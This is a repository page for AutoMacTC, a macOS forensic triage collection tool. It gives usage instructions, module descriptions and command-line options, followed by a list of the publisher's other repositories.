• Stars
    star
    491
  • Rank 89,657 (Top 2 %)
  • Language
    Python
  • License
    Other
  • Created over 5 years ago
  • Updated over 2 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

AutoMacTC: Automated Mac Forensic Triage Collector

AutoMacTC: Automated Mac Forensic Triage Collector

Purpose

This is a modular forensic triage collection framework designed to access various forensic artifacts on macOS, parse them, and present them in formats viable for analysis. The output may provide valuable insights for incident response in a macOS environment. Automactc can be run against a live system or dead disk (as a mounted volume.)

Requirements

  • Python 3.9 or earlier (backwards compatible with Python 2.7)
  • MacOS target systems, for live collection (successfully tested on macOS major releases 10.11 through 11.2.3 as well the as M1 processor)
  • MacOS analysis systems, for triage against a mounted disk image (disk images from macOS 10.11 through 10.15 systems are supported)

Basic usage

At its simplest, you can run automactc with the following invocation.

sudo /usr/bin/python automactc.py -m all

This will run all modules (-m) with default settings, i.e.

- default input directory will be /, or the root of the current volume
- default output directory will be ./, or the working directory from which automactc is run (NOT the location of the script)
- default prefix for output filenames will be automactc-output
- default behavior is to populate a runtime.log for debugging and info
- default format for individual artifacts output files is CSV
- default CPU priority is set to low
- default behavior on completion is to compress all output files to tar.gz

using the version of python that is pre-installed on the macOS device.

In order to list all available modules and do nothing else, simply run:

automactc.py -l

The inputdir and outputdir can be specified with the -i and -o flags, respectively.

automactc.py -i / -o /automactc_output -m all

For macOS 10.15+ systems, the -is flag is used to specify the input system drive if using mounted drive from 10.15+ system (e.g. "Macintosh HD").

Modules can be specified for inclusion or exclusion on a per-module basis. In other words, you can INCLUDE specific modules, such as pslist, bash, and profiler:

automactc.py -m pslist bash profiler

Or, you can exclude specific modules, to run all EXCEPT those specified, such as dirlist and autoruns:

automactc.py -x dirlist autoruns

Output Control

For every module, automactc will generate an output file and populate it with data. The output file format defaults to CSV, but can be toggled to JSON with the -fmt flag. It is not currently possible to specify output format on a per-module basis.

automactc.py -m all -fmt json 

Upon successfully populating the output file with data, the file is rolled into a .tar archive that is generated when automactc completes its first module. Upon completion of the last module, automactc will GZIP the .tar archive to .tar.gz.

The name of the tar archive follows the following naming convention:

prefix,hostname,ip,automactc_runtime.tar

The first field, prefix, can be specified at runtime with -p. If unspecified, the prefix is set to automactc-output. The other fields are populated from data gathered at runtime. This is useful when running automactc on several systems for a single incident.

automactc.py -m all -p granny-smith

While the default behavior is to generate a tarball, use of the -nt flag will prevent the creation of a tar archive and will leave the output files as-is in the output directory.

automactc.py -m all -p granny-smith -nt 

Current Modules

- pslist (current process list at time of automactc run)
- lsof (current file handles open at time of automactc run)
- netstat (current network connections at time of automactc run)
- unifiedlogs (collect Unified Logging events from a live system based on specified predicates)
- asl (parsed Apple System Log (.asl) files)
- auditlog (parsing audit log files from private/var/audit/)
- autoruns (parsing of various persistence locations and plists)
- bash (parsing bash/.*_history files for all users)
- chrome (parsing chrome visit history and download history)
- cookies (parsing the cookies database for each user for chrome and firefox)
- coreanalytics (parsing program execution evidence produced by Apple diagnostics)
- dirlist (list hof files and directories across the disk)
- eventtaps (parsing event tap items)
- firefox (parsing firefox visit history and download history)
- installhistory (parsing program installation history)
- mru (parsing SFL and MRU plist files)
- netconfig (parsing airport and network interface settings)
- quarantines (parsing QuarantineEventsV2 database)
- quicklook (parsing Quicklooks database)
- safari (parsing safari visit history and download history)
- spotlight (parsing user spotlight top searches)
- ssh (parsing known_hosts and authorized_keys files for each user)
- syslog (parsing system.log files)
- systeminfo (basic system identification, such as current IP address, serial no, hostname)
- terminalstate (decode and parse savedState files for the Terminal application for each user)
- users (listing present and deleted users on the system)
- utmpx (listing user sessions on terminals)

Advanced usage

One can utilize the --rtr flag to reduce verbosity of some modules to display nicely on CrowdStrike RTR console. Specifically the real time updates of the dirlist module are reduced in order to not overflow the console window.

automactc.py -m all --rtr

AutoMacTC can be deployed and executed with the provided sample bash wrapper deploy.sh. The provided wrapper will

  • execute AutoMacTC with the version python installed at /usr/bin/python
  • use the --rtr flag to reduce verbosity when running remotely via a terminal
  • use the --prefix 'automactc-output'
  • output in json format
  • exclude the 10.14/10.15+ unsupported live modules quicklooks, coreanalytics, and safari

To use the wrapper script:

  • Compress the automactc folder into a tar.gz archive

  • Copy the archive and the wrapper script to the host system into their own folder (or a location such as /private/tmp or /tmp)

  • Run the wrapper with sudo

    sudo bash deploy.sh

By default, automactc populates verbose debug logging into a file named prefix,hostname,ip,runtime.log. You can disable the generation of this log with:

automactc.py -m all -nl

By default, automactc will print the INFO and ERROR log messages to the console. To run automactc in quiet mode and write NO messages to the console, use -q. INFO messages include program startup messages, one message per module start, and completion/cleanup messages.

automactc.py -m all -q

To print DEBUG messages to the console along with INFO and ERROR messages, use the -d flag.

automactc.py -m all -d

Automactc runs with the lowest CPU priority (niceness) possible by default. It is possible to disable niceness and run at a normal priority with the -r flag.

automactc.py -m all -r 

Automactc can also be run against a dead disk, if the disk is mounted as a volume on the analysis system. Once mounted, run automactc with the appropriate inputdir (pointing to the Volume mount point) and -f to toggle forensic mode ON.

NOTE: for a live system, if you wish to collect dirlist on mounted peripheral devices, you can use -f with -i /, else dirlist will not recurse further into mounted /Volumes.

automactc.py -i /Volumes/mounted_IMAGE/ -o /path/to/output -f -m all

Dirlist Arguments

Directory Inclusion/Exclusion

It is possible to limit dirlist recursion to specific directories with the -K flag. By default, dirlist will attempt to recurse from the root of the inputdir volume unless otherwise specified with this flag. Multiple directories can be specified in a space separated list.

automactc.py -m dirlist -K /Users/ /Applications/ /tmp 

It is also possible to exclude specific directories from dirlist recursion with the -E flag.

automactc.py -m dirlist -E /path/to/KnownDevDirectory

By default, the following directories and file are excluded on live systems:

/.fseventsd (to reduce output verbosity)
/.DocumentRevisions-V100 (to reduce output verbosity)
/.Spotlight-V100 (to reduce output verbosity)
/Users/*/Pictures (to avoid permissions errors)
/Users/*/Library/Application Support/AddressBook (to avoid permissions errors)
/Users/*/Calendar (to avoid permissions errors)
/Users/*/Library/Calendars (to avoid permissions errors)
/Users/*/Library/Preferences/com.apple.AddressBook.plist (to avoid permissions errors)
/System/Volumes/Data/private/var/folders/kb/* (to reduce output verbosity)
/System/Volumes/Data/private/var/folders/zz/* (to reduce output verbosity)

By default, the following directories are excluded when running forensic mode against a mounted image:

/.fseventsd (to reduce output verbosity)
/.DocumentRevisions-V100 (to reduce output verbosity)
/.Spotlight-V100 (to reduce output verbosity)

Any additional directories to exclude will be appended to this default list, unless you provide the -E no-defaults argument first, in which case only your specified directories will be excluded.

automactc.py -m dirlist -E no-defaults /path/to/KnownDevDirectory

Hashing

The hashing arguments below can be used for BOTH dirlist and the autoruns modules.

By default, the dirlist module will hash files only with the sha256 algorithm. If you wish to use both the SHA256 and MD5 algorithms, use -H sha256 md5. If you wish to use only md5, use -H md5. If you wish to use neither, use -H none. NOTE: If you run the dirlist module against a dead disk with hashing enabled, this currently takes a LONG time to run.

automactc.py -m dirlist -H sha256 md5

By default, the dirlist module will only hash files with sizes under 10mb. To override this setting and hash files under a different size threshold, the threshold can be changed with the -S flag in number of megabytes. NOTE: increasing the size threshold will likely increase the amount of time it takes to run the dirlist module. For example, to hash files up to 15MB:

automactc.py -m dirlist -S 15

Bundles, Signatures, Multithreading

By default, the dirlist module will NOT recurse into bundle directories, including the following:

'.app', '.framework','.lproj','.plugin','.kext','.osax','.bundle','.driver','.wdgt','.Office','.blacklight'

To override this setting, use the -R flag. NOTE: this produces a far higher volume of output and takes significantly more time. These bundle directories will be configurable in a future update.

By default, the dirlist module will check codesignatures for all .app, .kext, and .osax files found. To prevent the dirlist module from checking any code signatures, use the -NC flag. This argument can be used for BOTH dirlist and the autoruns modules.

automactc.py -m dirlist -NC

By default, the dirlist module has been multithreaded to increase processing speed. Multithreading can be disabled with the -NM flag.

automactc.py -m dirlist -NM

Unified Logs Live module

By default, to reduce verbosity and time taken, only a subset of the total available sample predicates are enabled. You can optionally enable additional predicates by removing the comment character from existing predicates or by adding your own custom predicates.

The sample set of predicates was obtained from https://www.crowdstrike.com/blog/how-to-leverage-apple-unified-log-for-incident-response/.

Help Menu

usage: automactc.py [-m INCLUDE_MODULES [INCLUDE_MODULES ...] | -x
                EXCLUDE_MODULES [EXCLUDE_MODULES ...] | -l] [-h] [-v]
                [-i INPUTDIR] [-is INPUTSYSDIR] [-o OUTPUTDIR] [-p PREFIX]
                [-f] [-nt] [-nl] [-fmt {csv,json}] [-np] [-b] [-O]
                [-q | -r | -d]
                [-K DIR_INCLUDE_DIRS [DIR_INCLUDE_DIRS ...]]
                [-E DIR_EXCLUDE_DIRS [DIR_EXCLUDE_DIRS ...]]
                [-H DIR_HASH_ALG [DIR_HASH_ALG ...]]
                [-S DIR_HASH_SIZE_LIMIT] [-R] [-NC] [-NM]

AutoMacTC: an Automated macOS forensic triage collection framework.

module filter:

-m INCLUDE_MODULES [INCLUDE_MODULES ...], --include_modules INCLUDE_MODULES [INCLUDE_MODULES ...]
						module(s) to use, use "all" to run all modules, space
						separated list only
-x EXCLUDE_MODULES [EXCLUDE_MODULES ...], --exclude_modules EXCLUDE_MODULES [EXCLUDE_MODULES ...]
						assumes you want to run all modules EXCEPT those
						specified here, space separated list only
-l, --list_modules    if flag is provided, will list available modules and
						exit.

general arguments:

-h, --help            show this help message and exit
-v, --verbose         enable verbose logging
-i INPUTDIR, --inputdir INPUTDIR
						input directory; mount dmg with mountdmg.sh script and
						use -f to analyze mounted HFS or APFS Volume, use
						volume appended with "Data" (e.g. "Macintosh HD -
						Data") for 10.15+ systems
-is INPUTSYSDIR, --inputsysdir INPUTSYSDIR
						input system drive if using mounted drive from 10.15+
						system (e.g. "Macintosh HD")
-o OUTPUTDIR, --outputdir OUTPUTDIR
						output directory
-p PREFIX, --prefix PREFIX
						prefix to append to tarball and/or output files
-f, --forensic_mode   if flag is provided, will analyze mounted volume
						provided as inputdir
-nt, --no_tarball     if flag is provided, will NOT package output files
						into tarball
-nl, --no_logfile     if flag is provided, will NOT generate logfile on disk
-fmt {csv,json}, --output_format {csv,json}
						toggle between csv and json output, defaults to csv
-np, --no_low_priority
						if flag is provided, will NOT run automactc with
						highest niceness (lowest CPU priority). high niceness
						is default
-b, --multiprocessing
						if flag is provided, WILL multiprocess modules
						[WARNING: Experimental!]
-O, --override_mount  if flag is provided, WILL bypass error where inputdir
						does not contain expected subdirs

console logging verbosity:

-q, --quiet           if flag is provided, will NOT output to console at all
-r, --rtr             reduce verbosity to display nicely on RTR console
-d, --debug           enable debug logging to console

specific module arguments:

-K DIR_INCLUDE_DIRS [DIR_INCLUDE_DIRS ...], --dir_include_dirs DIR_INCLUDE_DIRS [DIR_INCLUDE_DIRS ...]
						directory inclusion filter for dirlist module,
						defaults to volume root, space separated list only
-E DIR_EXCLUDE_DIRS [DIR_EXCLUDE_DIRS ...], --dir_exclude_dirs DIR_EXCLUDE_DIRS [DIR_EXCLUDE_DIRS ...]
						directory and file exclusion filter for dirlist
						module. defaults are specified in README. space
						separated list only. put 'no-defaults' as first item
						to overwrite default exclusions and then provide your
						own exclusions
-H DIR_HASH_ALG [DIR_HASH_ALG ...], --dir_hash_alg DIR_HASH_ALG [DIR_HASH_ALG ...]
						either sha256 or md5 or both or none, at least one is
						recommended, defaults to sha256. also applies to
						autoruns module
-S DIR_HASH_SIZE_LIMIT, --dir_hash_size_limit DIR_HASH_SIZE_LIMIT
						file size filter for which files to hash, in
						megabytes, defaults to 10MB. also applies to autoruns
						module
-R, --dir_recurse_bundles
						will fully recurse app bundles if flag is provided.
						this takes much more time and space
-NC, --dir_no_code_signatures
						if flag is provided, will NOT check code signatures
						for app and kext files. also applies to autoruns
						module
-NM, --dir_no_multithreading
						if flag is provided, will NOT multithread the dirlist
						module

More Repositories

1

CRT

Contact: [email protected]
PowerShell
696
star
2

falconpy

The CrowdStrike Falcon SDK for Python
Python
358
star
3

psfalcon

PowerShell for CrowdStrike's OAuth2 APIs
PowerShell
350
star
4

Forensics

Scripts and code referenced in CrowdStrike blog posts
Python
325
star
5

Tortilla

C
281
star
6

ember-timetree

Visualize hierarchical timeline data. Built with Ember.js and D3.js
JavaScript
273
star
7

SuperMem

A python script developed to process Windows memory images based on triage type.
Python
258
star
8

travel-laptop

Auxiliary documentation and scripts around "A Reasonably Safe Travel Burner Laptop"
C++
225
star
9

falcon-orchestrator

CrowdStrike Falcon Orchestrator provides automated workflow and response capabilities
JavaScript
181
star
10

CrowdDetox

The CrowdDetox plugin for Hex-Rays automatically removes junk code and variables from Hex-Rays function decompilations.
C++
157
star
11

cs-bro

Bro scripts written by CrowdStrike Services
Zeek
147
star
12

Cloud-AWS

A collection of projects supporting AWS Integration
Python
146
star
13

logscale-community-content

This repository contains Community and Field contributed content for LogScale
Shell
139
star
14

CrowdFMS

CrowdStrike Feed Management System. CrowdFMS is a framework for automating collection and processing of samples from VirusTotal, by leveraging the Private API system. This framework automatically downloads recent samples, which triggered an alert on the users YARA notification feed.
Python
123
star
15

csproto

CrowdStrike's Protocol Buffers library
Go
122
star
16

falcon-scripts

Scripts to streamline the deployment and use of the CrowdStrike Falcon sensor
PowerShell
117
star
17

Falcon-Toolkit

Unleash the power of the Falcon Platform at the CLI
Python
108
star
18

falcon-query-assets

Welcome to the Falcon Query Assets GitHub page.
Shell
98
star
19

ansible_collection_falcon

Comprehensive toolkit for streamlining your interactions with the CrowdStrike Falcon platform.
Python
88
star
20

xwf-yara-scanner

C
84
star
21

CAST

CrowdStrike Archive Scan Tool
PowerShell
83
star
22

tf2rust

Tensorflow to Rust is a tool to convert trained Tensorflow models to pure Rust code.
Python
83
star
23

VirtualGHOST

VirtualGHOST Detection Tool
PowerShell
83
star
24

falcon-helm

Helm Charts for running CrowdStrike Falcon with Kubernetes
Smarty
71
star
25

gofalcon

Golang-based SDK to CrowdStrike's APIs
Go
57
star
26

pyspresso

The pyspresso package is a Python-based framework for debugging Java.
Python
51
star
27

falcon-operator

Go
49
star
28

ember-browser-services

Services for interacting with browser APIs so that you can have fine-grained control in tests.
TypeScript
46
star
29

MISP-tools

Import CrowdStrike Threat Intelligence into your instance of MISP
Python
39
star
30

detection-container

PHP
38
star
31

perseus

The hero we all need to defeat the kraken that is Go module dependency graphs
Go
37
star
32

gotel

GoTel - Scheduled job monitoring
Go
36
star
33

falcon-windows-host-recovery

Automated Windows host recovery
Rich Text Format
35
star
34

community

CrowdStrike's Open Source Policy & Contribution Guide
HTML
35
star
35

caracara

Developer enhancements (DX) for FalconPy, the CrowdStrike Python SDK
Python
34
star
36

container-image-scan

Code to scan a container with CrowdStrike and return response codes indicating pass/fail status.
Python
33
star
37

Dockerfiles

Automation to help create container images pre-loaded with the CrowdStrike Falcon sensor.
Shell
31
star
38

chopshop

Mitre chopshop network decoder framework
Python
30
star
39

FDR

Falcon Data Replicator
Python
29
star
40

faltest

A different take on WebDriver browser testing
JavaScript
28
star
41

ember-headless-form

Headless forms with a11y and validation support built in
TypeScript
28
star
42

Cloud-Azure

Discover for Cloud and Containers Azure
HCL
27
star
43

embersim-databank

Code for the paper "EMBERSim: A Large-Scale Databank for Boosting Similarity Search in Malware Analysis"
Python
25
star
44

apbf

Go package implementing Age-Partitioned Bloom Filters (APBF)
Go
25
star
45

go-metrics-sliding-window

A sliding window sampling implementation for the rcrowley/go-metrics library.
Go
24
star
46

ember-headless-table

TypeScript
23
star
47

ember-aria-utilities

ARIA utilities for helping create some of the more complex ARIA design patterns. Follows https://www.w3.org/TR/wai-aria-practices/
TypeScript
20
star
48

bpfmon-example

proof-of-concept example of using eBPF to Monitor for eBPF Map tampering
C
20
star
49

falcon-windows-repair

Scripts to aid in diagnosing and repairing unhealthy Windows Falcon Sensor installations
PowerShell
19
star
50

ember-resource-tasks

Resources for async functions in Ember
TypeScript
18
star
51

falcon-integration-gateway

Falcon Integration Gateway (FIG)
Python
18
star
52

cloud-resource-estimator

Cloud deployment size calculation utilities
Python
17
star
53

ember-url-hash-polyfill

Support for in/inter page linking / scrolling with hashes in EmberJS
TypeScript
17
star
54

tf-layers

Tensorflow Layers provides Rust implementations of Tensorflow model layers
Rust
16
star
55

tailwind-toucan-base

Base Tailwind config for the Toucan design system.
JavaScript
15
star
56

aws-ssm-distributor

HCL
15
star
57

omigo-data-analytics

Data Analytics Library for Python
Python
15
star
58

helpful-links

List of helpful publicly available CrowdStrike material.
14
star
59

ivan

Falcon Image Vulnerability Analysis (IVAN) is a command-line image assessment tool.
13
star
60

container-image-scan-action

CrowdStrike Container Image Scan Github Action
Shell
13
star
61

zscaler-FalconX-integration

This is the integration to feed Falcon X IOC data into zscaler's platform
Python
13
star
62

ember-velcro

Ember Velcro sticks one element to another with Floating UI.
TypeScript
13
star
63

kafka-replicator

Kafka replicator is a tool used to mirror and backup Kafka topics across regions
Go
13
star
64

OWASSRF

PowerShell
13
star
65

falconjs

CrowdStrike Falcon API JS library for the browser and Node
TypeScript
12
star
66

rusty-falcon

Rust bindings for CrowdStrike Falcon API
Rust
12
star
67

Identity-Protection

PowerShell
11
star
68

monorepo-next

Detach monorepo packages from normal linking
JavaScript
10
star
69

NotPetyaDecryptor

Python
9
star
70

ember-toucan-core

Toucan Design System
TypeScript
9
star
71

aws-security-lake

Integration guide for CrowdStrike and Amazon Security Lake
Shell
8
star
72

terraform-provider-crowdstrike

https://registry.terraform.io/providers/CrowdStrike/crowdstrike/latest/docs
Go
7
star
73

puppet-falcon

Ruby
7
star
74

terraform-kubectl-falcon

Module to manage CrowdStrike Falcon Sensor and the Kubernetes Protection Agent on a Kubernetes cluster.
HCL
7
star
75

Cloud-GCP

A collection of projects supporting GCP integration
Shell
6
star
76

cloud-tools-image

Command-line tools for remote communication with public and private cloud environments.
Shell
6
star
77

aws-verified-access

Integration details between CrowdStrike Falcon Zero Trust Assessments (ZTA) and AWS Verified Access
6
star
78

foundry-sample-mitre

Triage with MITRE Attack sample Foundry app
CSS
6
star
79

HEC-Log-Shipper

This repository contains examples of code used to send data to Humio instances
Python
5
star
80

image-scan-example

HCL
5
star
81

Container-Security

HCL
5
star
82

cloud-scripts-hide-host

Event driven solution to automatically hide hosts from CrowdStrike upon termination.
Python
5
star
83

foundry-sample-scalable-rtr

Scalable RTR sample Foundry app
TypeScript
5
star
84

foundry-fn-go

Go
4
star
85

crimson-falcon

A Shiny Ruby SDK of our Falcon API
Ruby
4
star
86

ember-toucan-styles

Ember wrapper, CSS, and JS utilities for working with the Toucan design system
JavaScript
4
star
87

ember-three

Ember.js three.js shim
JavaScript
4
star
88

foundry-sample-rapid-response

Rapid Response sample Foundry app
TypeScript
4
star
89

falcon-cli

Go
3
star
90

logscale-azure-event-hub-collector

LogScale Azure Event Hub Collector
Python
3
star
91

cloud-pov

HCL
3
star
92

devdays

Shell
3
star
93

cs.aws_account

Python
3
star
94

chronicle-intel-bridge

CrowdStrike to Chronicle Intel Bridge
Python
3
star
95

kubectl-falcon

Plug-in to kubectl command-line tool that helps with manipulation of Falcon Container.
Go
3
star
96

upb-cloud-workshop

A cloud workshop organised by Crowdstrike in Bucharest, Romania for the students of Universitatea Politehnica Bucharest
Go
3
star
97

opensource.crowdstrike.com

JavaScript
3
star
98

CrowdStrike-Spotlight-Humio-Package-Integration

Python
3
star
99

ember-number-to-words-shim

Ember.js number-to-words shim
JavaScript
3
star
100

template-gitbook-workshop

Code behind https://crowdstrike.gitbook.io/template-gitbook-workshop/
CSS
3
star